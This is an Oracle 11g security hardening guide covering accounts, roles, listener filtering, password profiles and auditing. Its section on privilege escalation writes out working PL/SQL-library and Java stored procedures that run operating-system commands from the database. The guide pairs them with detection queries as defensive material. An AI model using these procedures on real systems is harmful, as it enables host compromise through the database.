Oracle Security Configuration

Source: Internet
Author: User
Tags: strong password

0x01 Test environment
Operating system: Windows Server 2008 x64
Oracle: 11.2.0.1.0
0x02 Oracle permissions

  1. An Oracle database is served by an instance. Creating a new database creates a new instance, and each instance runs as its own process (on Windows, the OracleService<SID> service).
  2. A user corresponds to a schema. Once a user creates a data object (such as a table), the object lives in that user's schema: the owner refers to it directly, and other users refer to it as schema_name.object_name.
  3. By default a user has privileges only on the objects in its own schema, and other users have no privileges on them. SYS and SYSTEM have privileges on all schemas by default.
  4. When a user logs on to an Oracle instance, Oracle first checks whether the user holds the logon privilege (CREATE SESSION). Without it the logon is refused; with it the logon succeeds. After logon, what the user can do is decided by its privileges: an operation succeeds if the user holds the required privilege and fails otherwise.
  5. Oracle has two core processes: the database server process and the listener process. An external connection reaches the listener first; the listener hands the connection to the instance that matches the service or SID the client asked for.

0x03 Oracle system services
Oracle 11g installed on Windows Server 2008 registers seven services:
A. Oracle ORCL VSS Writer Service: the Oracle Volume Shadow Copy Service writer. VSS (Volume Shadow Copy Service) lets storage devices (disks and arrays) create high-fidelity point-in-time images, that is, shadow copies. It can create shadow copies of one or more volumes without affecting system performance. (Not mandatory)
B. OracleDBConsoleorcl: the Oracle Database Console service. orcl is the Oracle instance ID; the default instance is orcl. Start this service when using Enterprise Manager (OEM). (Not mandatory)
C. OracleJobSchedulerORCL: the Oracle job scheduler (timer) service. ORCL is the Oracle instance ID. (Not mandatory)
D. OracleMTSRecoveryService: lets the database act as a resource manager for transactions in a distributed environment, such as Microsoft Transaction Server (MTS) and COM/COM+ objects. (Not mandatory)
E. OracleOraDb11g_home1ClrAgent: part of the Oracle Database .NET (CLR) extension services. (Not mandatory)
F. OracleOraDb11g_home1TNSListener: the listener service, needed only when the database has to be reached over the network. (Not mandatory for local use, but required for external access)
G. OracleServiceORCL: the database (instance) service, the core Oracle service and the basis for starting the database. The database can start only when this service is running. (Must be started)
Which services need to be started during development?
For beginners who only use the SQL*Plus shipped with Oracle, OracleServiceORCL is enough. Third-party tools such as PL/SQL Developer connect through the listener, so OracleOraDb11g_home1TNSListener must also be running. OracleDBConsoleorcl is needed only to reach the web-based EM; the remaining services are rarely used.
0x04 Oracle default accounts
After Oracle 11g is installed, the system contains many default accounts. All of them are locked except four; unless you have a specific need, do not unlock them. The four open accounts are:
  1. SYS. SYS is created when the database is created and is granted the DBA role by default. All base tables and views of the data dictionary are stored in the SYS schema, and they are essential to the operation of the database. To preserve the integrity of the data dictionary, tables in the SYS schema are maintained only by the system: no user or database administrator may modify them, and no user may create tables in the SYS schema.
  2. SYSTEM. Like SYS, SYSTEM is created by default when the database is created and is granted the DBA role. It owns tables and views that display administrative information, as well as internal tables and views used by various Oracle tools and applications.
  3. DBSNMP. DBSNMP is the account used by the Intelligent Agent to monitor and manage database performance. If it is locked, the agent can no longer collect that data.
  4. SYSMAN. SYSMAN is the account used by Enterprise Manager. If you do not need it, lock or drop it.
The passwords of these four accounts are set during installation. DBSNMP and SYSMAN are generally unused; we recommend locking them.
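The following script, an added example that is not part of the original article, carries out the inventory and lock-down described above on an 11g instance. It is run as SYSDBA or SYSTEM; the account names are the 11g defaults listed above, the DBA_USERS_WITH_DEFPWD view is the one 11g ships to flag accounts still using the installation default password, and the password placeholder is an assumption to be replaced.

```sql
-- Added example (not from the original article): inventory the open accounts
-- on an 11g instance and lock the two the text says are usually unused.
-- Run as SYSDBA or SYSTEM.

-- 1. Which accounts are open at all? Expect only SYS, SYSTEM, DBSNMP, SYSMAN
--    on a fresh install; anything else was unlocked by someone.
SELECT username, account_status, profile, created
  FROM dba_users
 WHERE account_status NOT LIKE 'LOCKED%'
 ORDER BY username;

-- 2. Which accounts still use a known default password? A lock can be lifted,
--    so a default password is a finding even on a locked account.
SELECT u.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 ORDER BY u.username;

-- 3. Lock the agent and EM accounts when neither the Intelligent Agent nor
--    Enterprise Manager is in use. Stop the OracleDBConsoleorcl service first:
--    it logs on as SYSMAN and will fail once the account is locked.
ALTER USER dbsnmp ACCOUNT LOCK;
ALTER USER sysman ACCOUNT LOCK;

-- 4. Change the password of any account flagged in step 2 (placeholder
--    password below is an assumption; use one that meets the policy in 0x07).
ALTER USER dbsnmp IDENTIFIED BY "<new strong password>";

-- 5. Re-run step 1: only SYS and SYSTEM should remain open.
SELECT username, account_status
  FROM dba_users
 WHERE account_status NOT LIKE 'LOCKED%'
 ORDER BY username;
```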
0x05 Oracle privileges and roles
A. Privileges
Oracle privileges are divided into system privileges and object privileges. A newly created user holds no privileges and can do nothing, not even log on. To perform a given database operation it must be granted the corresponding system privilege; to access objects in another schema it must be granted object privileges on those objects.
A system privilege is the right to execute a particular kind of SQL statement; it controls which database operations a user may perform. For example, CREATE TABLE allows creating tables in the user's own schema, while CREATE ANY TABLE allows creating tables in any schema. Oracle provides more than 100 system privileges.
Common system privileges:
  CREATE SESSION         connect to the database
  CREATE VIEW            create views
  CREATE PROCEDURE       create procedures, functions and packages
  CREATE CLUSTER         create clusters
  CREATE TABLE           create tables
  CREATE PUBLIC SYNONYM  create public synonyms
  CREATE TRIGGER         create triggers
Common object privileges:
  ALTER       change the table structure
  DELETE      delete rows
  SELECT      query rows
  INSERT      insert rows
  UPDATE      modify rows
  INDEX       create an index on the table
  REFERENCES  create a foreign key that references the table
  EXECUTE     run a procedure, function or package
Note: ALL can be used in place of the list (select, update, insert, alter, index, delete, ...) to grant every object privilege that applies to the object.
B. Roles
Oracle roles are divided into predefined (system) roles and custom roles. A custom role can be given whatever privileges are needed. The predefined roles are described as follows:
DBA: holds all system privileges and is the most powerful role; only a DBA can create the database structure.
RESOURCE: can create its own objects (tables, procedures, triggers and so on) but cannot change the database structure. Note that in 11g, granting RESOURCE also grants the UNLIMITED TABLESPACE system privilege, so the account can consume space in any tablespace, including SYSTEM.
CONNECT: since 10g R2 holds only CREATE SESSION, so the user can log on but cannot create objects or change the database structure.
For ordinary users: grant CONNECT and RESOURCE.
For DBA users: grant CONNECT, RESOURCE and DBA.
0x06 Creating the database account for a website
Solution 1:
  1. Log on as SYSTEM, create a user and grant it the CONNECT and RESOURCE roles.
  2. Log on as the new user and create the tables it needs.
  3. Log on as SYSTEM and revoke CONNECT and RESOURCE from the new user.
  4. Log on as SYSTEM and grant the new user the CREATE SESSION privilege.
  5. Log on as SYSTEM and give the new user a quota on the USERS tablespace. Revoking RESOURCE does not take back the UNLIMITED TABLESPACE privilege that came with it, so revoke that explicitly and rely on the quota.
Solution 2:
  1. Log on as SYSTEM and create the tables the website needs.
  2. Log on as SYSTEM and create a user for the website.
  3. Log on as SYSTEM, grant the user CREATE SESSION, and grant it the object privileges the website actually needs (SELECT, INSERT, UPDATE, DELETE as required) on the tables created in step 1.
  4. Log on as SYSTEM and give the user a quota on the USERS tablespace (needed only if the account creates objects of its own; an account that only reads and writes another schema's tables needs no quota).
  5. The website refers to the tables as system.table_name.
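Solution 2 as one script, an added example that is not part of the original article. It generalizes the scheme slightly: the tables are owned by a dedicated, normally locked schema owner instead of SYSTEM, since application objects in the SYSTEM schema cannot be separated from the administrative account later. Every name (WEBAPP_OWNER, WEBAPP, the ORDERS table, the quotas and the password placeholders) is an assumption; run it as SYSTEM or another DBA.

```sql
-- Added example (not from the original article): least-privilege website
-- account following Solution 2, with a dedicated schema owner. All names and
-- password placeholders are assumptions. Run as SYSTEM.

-- Schema owner: holds the tables, used only for deployments, never by the site.
-- Kept locked except while schema changes are being applied.
CREATE USER webapp_owner IDENTIFIED BY "<strong owner password>"
  DEFAULT TABLESPACE users
  QUOTA 500M ON users
  ACCOUNT LOCK;
GRANT CREATE SESSION, CREATE TABLE, CREATE SEQUENCE, CREATE VIEW TO webapp_owner;

-- The table the site works with, created by the DBA in the owner's schema
-- (space is charged against webapp_owner's quota, not the DBA's).
CREATE TABLE webapp_owner.orders (
  id        NUMBER        PRIMARY KEY,
  customer  VARCHAR2(100) NOT NULL,
  amount    NUMBER(10,2)  NOT NULL,
  created   DATE          DEFAULT SYSDATE
);

-- Runtime account: may log on and touch exactly the objects it is granted.
-- No RESOURCE role and a zero quota, so it can create nothing of its own; an
-- injected CREATE LIBRARY or CREATE PROCEDURE (see 0x08) has nothing to use.
CREATE USER webapp IDENTIFIED BY "<strong app password>"
  DEFAULT TABLESPACE users
  QUOTA 0 ON users;
GRANT CREATE SESSION TO webapp;
GRANT SELECT, INSERT, UPDATE ON webapp_owner.orders TO webapp;  -- no DELETE unless needed

-- Optional: a private synonym lets the site write ORDERS instead of
-- WEBAPP_OWNER.ORDERS. SYSTEM can create it in webapp's schema directly, so
-- the runtime account needs no extra privilege for it.
CREATE SYNONYM webapp.orders FOR webapp_owner.orders;

-- Verify: CREATE SESSION should be the only system privilege, no roles at all,
-- and object privileges limited to the one table.
SELECT privilege FROM dba_sys_privs WHERE grantee = 'WEBAPP';
SELECT granted_role FROM dba_role_privs WHERE grantee = 'WEBAPP';
SELECT owner, table_name, privilege FROM dba_tab_privs WHERE grantee = 'WEBAPP';
```

Connecting as webapp and running `SELECT * FROM orders` then works through the synonym, while `CREATE TABLE t (x NUMBER)` fails with ORA-01031 (insufficient privileges) because the account holds neither CREATE TABLE nor a quota.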
0x07 Oracle security configuration
1. Restrict which hosts can reach the listener port.
Method 1: firewall. On Windows, restrict the source IP addresses allowed to reach the listener port with Windows Firewall; on Linux, with iptables.
Method 2: on Windows, an IPsec policy can also restrict which addresses may reach the listener port.
Method 3: let the listener itself filter clients. Set the following lines in $ORACLE_HOME/network/admin/sqlnet.ora on the server:
  tcp.validnode_checking = yes
  # IP addresses allowed to connect
  tcp.invited_nodes = (ip1,ip2,...)
  # IP addresses refused
  tcp.excluded_nodes = (ip1,ip2,...)
When both lists are present, tcp.invited_nodes takes precedence; when only tcp.invited_nodes is set, every address not listed is refused, so include the database server's own address and any monitoring hosts. The listener reads sqlnet.ora at start-up, so restart it for the change to take effect.
  1. Change the listener port from the default 1521 to reduce exposure to casual scans.
  2. Disable unnecessary services. Apart from OracleServiceORCL and OracleOraDb11g_home1TNSListener, the other services can be stopped. In particular, OracleDBConsoleorcl starts the web-based EM, which listens on port 1158; stop it if it is not needed.
  3. Every account must have a strong password: at least 8 characters, mixing upper- and lower-case letters, digits and special characters. Enforce this with a password verification function in a profile rather than relying on users to comply.
  4. Of the four accounts Oracle leaves unlocked by default, lock DBSNMP and SYSMAN.
  5. Privileged accounts: limit remote logon by database super administrators. A. Set REMOTE_LOGIN_PASSWORDFILE = NONE in the spfile, which disables SYSDBA/SYSOPER password authentication over the network. B. Set SQLNET.AUTHENTICATION_SERVICES = (NONE) in sqlnet.ora, which disables OS authentication so that a local "sqlplus / as sysdba" no longer logs on automatically. With the password file disabled, SYSDBA logon depends on OS authentication, so applying both settings can lock you out of administration; keep an administrative path and test on a non-production instance first.
  6. Enable auditing. The audit trail records what is done in the database, at the cost of some resources; decide the scope based on the actual situation.
  7. Give the website's database account the minimum privileges, following the recommended scheme in 0x06.
  8. Run the database process under a suitable account. Create a new low-privilege Windows account for the Oracle services and grant it write access to the database directories. If the services fail to run with that configuration, fall back to granting the account full control over the whole Oracle directory tree.
  9. Limit the database process account's access to the disk. Do not grant it any special rights outside the Oracle directories; ideally it should not even have read access elsewhere. Tune this to the actual situation; the principle is that its rights on the database directories are enough for normal operation and no other directory is accessible.
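The database-side part of items 3, 5 and 6 as one script, an added example that is not part of the original article. It is run as SYSDBA on the 11g test instance. Assumptions: the profile name APP_PROFILE, the account WEBAPP and the particular audit options are mine; VERIFY_FUNCTION_11G is the function created by Oracle's own $ORACLE_HOME/rdbms/admin/utlpwdmg.sql, which checks length of at least 8 plus at least one letter and one digit and a few blacklisted values, so the page's stricter rule (mixed case and special characters) requires editing that function.

```sql
-- Added example (not from the original article): items 3, 5 and 6 of the
-- hardening list on the database side. Run as SYSDBA. Profile, account and
-- audit options are assumptions.

-- Item 3: password policy in a profile. utlpwdmg.sql creates
-- VERIFY_FUNCTION_11G and also attaches it to the DEFAULT profile, so every
-- account gets the check; the custom profile below tightens lockout limits.
@?/rdbms/admin/utlpwdmg.sql

CREATE PROFILE app_profile LIMIT
  PASSWORD_VERIFY_FUNCTION verify_function_11g
  PASSWORD_LIFE_TIME       90     -- days before a password must be changed
  PASSWORD_GRACE_TIME      7
  PASSWORD_REUSE_MAX       10     -- previous passwords that may not be reused
  PASSWORD_REUSE_TIME      365
  FAILED_LOGIN_ATTEMPTS    5      -- brute force: lock after five failures
  PASSWORD_LOCK_TIME       1/24;  -- for one hour (fraction of a day)
ALTER USER webapp PROFILE app_profile;

-- Item 5: no SYSDBA/SYSOPER password logon over the network. SCOPE=SPFILE
-- means it takes effect at the next restart; sqlnet.ora is edited separately.
ALTER SYSTEM SET remote_login_passwordfile = NONE SCOPE = SPFILE;

-- Item 6: keep the audit trail in the database with the SQL text (EXTENDED),
-- then audit the actions an attacker takes after a compromise, including the
-- first step of both escalation paths in 0x08.
ALTER SYSTEM SET audit_trail = DB, EXTENDED SCOPE = SPFILE;
-- after the restart:
AUDIT SESSION;                                   -- every logon and logoff
AUDIT CREATE LIBRARY, CREATE ANY LIBRARY;
AUDIT CREATE PROCEDURE, CREATE ANY PROCEDURE;
AUDIT GRANT ANY PRIVILEGE, GRANT ANY ROLE;
AUDIT ALTER USER, CREATE USER, DROP USER;

-- Verify.
SELECT username, profile, account_status FROM dba_users WHERE username = 'WEBAPP';
SELECT audit_option, success, failure FROM dba_stmt_audit_opts ORDER BY 1;
SELECT privilege, success, failure FROM dba_priv_audit_opts ORDER BY 1;
SELECT name, value FROM v$parameter
 WHERE name IN ('audit_trail', 'remote_login_passwordfile');
```

Failed logons then appear in DBA_AUDIT_SESSION with RETURNCODE 1017, and a sixth failure locks the account (account_status becomes LOCKED(TIMED)) until the hour expires or a DBA runs ALTER USER ... ACCOUNT UNLOCK.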
0x08 Oracle privilege escalation and defence
1. Privilege escalation through PL/SQL
An external procedure that points a library at the C runtime's system() function:
  create or replace library exec_shell as '$ORACLE_HOME\bin\msvcrt.dll';
  create or replace procedure execmd (command in char) is
    external name "system"
    library exec_shell
    language c;
  /
  exec execmd('net user >netaaa.txt');
2. Privilege escalation through Java
A Java stored procedure that calls Runtime.exec():
  CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
  import java.lang.*;
  import java.io.*;
  public class JAVACMD {
      public static void execCommand (String command) throws IOException {
          Runtime.getRuntime().exec(command);
      }
  };
  /
  CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
  AS LANGUAGE JAVA NAME 'JAVACMD.execCommand (java.lang.String)';
  /
  exec javacmdproc('cmd.exe /c net user > netaaa.txt');
Both methods succeed when run as SYS and fail for an ordinary user, so the defence is to control the SYS privileged account. If an attacker does obtain a privileged database account, the only remaining limit is the operating-system account the database process runs under: run it as a low-privilege account and restrict its disk permissions so that what the attacker can reach is as small as possible. This article does not cover escalating a low-privilege Oracle account to DBA and then from the database to the operating system.
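Both paths depend on privileges that an ordinary account should not hold: the PL/SQL one needs CREATE LIBRARY (or CREATE ANY LIBRARY) plus CREATE PROCEDURE, and the Java one needs CREATE PROCEDURE plus a java.lang.RuntimePermission granted through DBMS_JAVA. The following inventory, an added example that is not part of the original article, lists every account other than SYS and SYSTEM that holds them, so you can see who besides the super administrators could run the code above. The view names are standard 11g dictionary views; the selection of "dangerous" privileges and roles is my own.

```sql
-- Added example (not from the original article): who, apart from SYS and
-- SYSTEM, holds what the two escalation paths in 0x08 need? Run as a DBA.

-- System privileges and roles that allow creating libraries or procedures,
-- granting privileges, or impersonating users. RESOURCE is included because
-- in 11g it carries CREATE PROCEDURE.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE LIBRARY', 'CREATE ANY LIBRARY',
                     'CREATE PROCEDURE', 'CREATE ANY PROCEDURE',
                     'EXECUTE ANY PROCEDURE', 'ALTER ANY PROCEDURE',
                     'GRANT ANY PRIVILEGE', 'GRANT ANY ROLE',
                     'ALTER USER', 'BECOME USER')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
UNION ALL
SELECT grantee, 'ROLE ' || granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'RESOURCE', 'JAVASYSPRIV', 'JAVA_ADMIN')
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY 1, 2;

-- Java: Runtime.exec() needs java.lang.RuntimePermission (and usually
-- java.io.FilePermission on the executable). These are granted per schema via
-- DBMS_JAVA.GRANT_PERMISSION and recorded in DBA_JAVA_POLICY.
SELECT grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name IN ('java.lang.RuntimePermission', 'java.io.FilePermission')
   AND enabled = 'ENABLED'
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV', 'JAVA_ADMIN')
 ORDER BY grantee, type_name;

-- Artefacts that already exist: a library pointing at any DLL that is not
-- Oracle's own, or a user-created Java source, is worth a second look.
SELECT owner, library_name, file_spec, status
  FROM dba_libraries
 WHERE file_spec IS NOT NULL
 ORDER BY owner, library_name;

SELECT owner, object_name, created, last_ddl_time
  FROM dba_objects
 WHERE object_type IN ('JAVA SOURCE', 'JAVA CLASS')
   AND owner NOT IN ('SYS', 'SYSTEM', 'MDSYS', 'ORDSYS', 'EXFSYS', 'XDB')
 ORDER BY created DESC;
```

On the test instance described in 0x01, with the website account created as in 0x06, the first two queries should return no rows for that account; any row naming it means a grant has crept in that turns the escalation above into a one-statement job.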
0x09 Common Oracle commands
(yonghuming and mima are placeholders for the user name and password.)
1. Connect to the database
  conn sys/mima@orcl as sysdba;
2. Create a user
  create user yonghuming identified by mima;
3. Grant privileges
  grant connect, resource to yonghuming;
  grant create session to yonghuming;
  alter user yonghuming quota unlimited on USERS;
  grant unlimited tablespace to yonghuming;
  grant select on testable to yonghuming;
Note: UNLIMITED TABLESPACE is a system privilege that allows space in every tablespace, including SYSTEM; for an application account prefer a quota on its own tablespace and omit that grant.
4. Revoke privileges
  revoke connect, resource from yonghuming;
5. Lock, unlock and drop an account
  alter user yonghuming account lock;
  alter user yonghuming account unlock;
  drop user yonghuming cascade;
